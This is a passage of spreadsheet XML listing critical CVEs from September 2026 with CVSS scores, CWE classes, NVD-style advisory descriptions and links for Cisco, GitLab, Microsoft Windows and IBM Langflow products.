      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20307</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20307</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20322</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20322 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) CWE-284.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20322</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20324</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure Firewall Management Center (FMC) Software could allow an authenticated, remote attacker to execute arbitrary commands as root.
This vulnerability exists because a registered sftunnel peer has incorrect permissions to write an arbitrary file to any location on the device. An attacker could exploit this vulnerability by hijacking the sftunnel communication connection or being a valid registered sftunnel peer and sending an sftunnel command to write a malicious file to the disk of an affected device. A successful exploit could allow the attacker to write a file to the device that is executed with root privileges. To exploit this vulnerability, the attacker must have valid user credentials on the affected device.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20324</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20325</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20325 are related to improper neutralization of special elements used in a command issue that are grouped under the Common Weakness Enumeration (CWE) CWE-77.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20325</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20329</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20329 are related to issues concerning improper handling of exceptional conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-703.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20329</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20330</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-707</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20330 are related to improper neutralization issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-707.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20330</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20332</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20332 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20332</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87719</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 18.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could allow an authenticated user with Duo Chat access to obtain Advanced Search instance configurations and sensitive credentials using a specially crafted GraphQL subscription argument to bypass serialization and perform server object lookup.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87719</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20242</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the External Database Access feature of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to execute arbitrary commands as&amp;nbsp;root on an affected device.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream from a host that is configured in the external database access list. An attacker could exploit this vulnerability by sending a crafted, serialized Java byte stream to a specific TCP port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the device and elevate privileges to root.
Notes:
This vulnerability can be exploited only by an attacker who has control of a host in the external database access list.
If the FMC management interface does not have public internet access, the attack surface that is associated with this vulnerability is reduced.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20242</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20326</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20326 are related to missing authentication for critical function issues that are grouped under the Common Weakness Enumeration (CWE) CWE-306.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20326</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17"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7" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18"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8" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19"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19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20"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20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12944</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql, redis</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.0 can allow attackers to execute arbitrary Python code with root privileges (UID=0) on the Langflow server by submitting components containing socket or urllib imports. This enables: (1) AWS credential theft via IMDSv1 SSRF with full IAM role permissions, (2) arbitrary file exfiltration from the container filesystem, and (3) lateral movement to internal services (PostgreSQL, Redis) within the Docker network. The scanner incorrectly returns "validated": true, providing a false security signal.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12944</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20331</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20331 are related to the failure of protection mechanisms issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-693.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20331</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
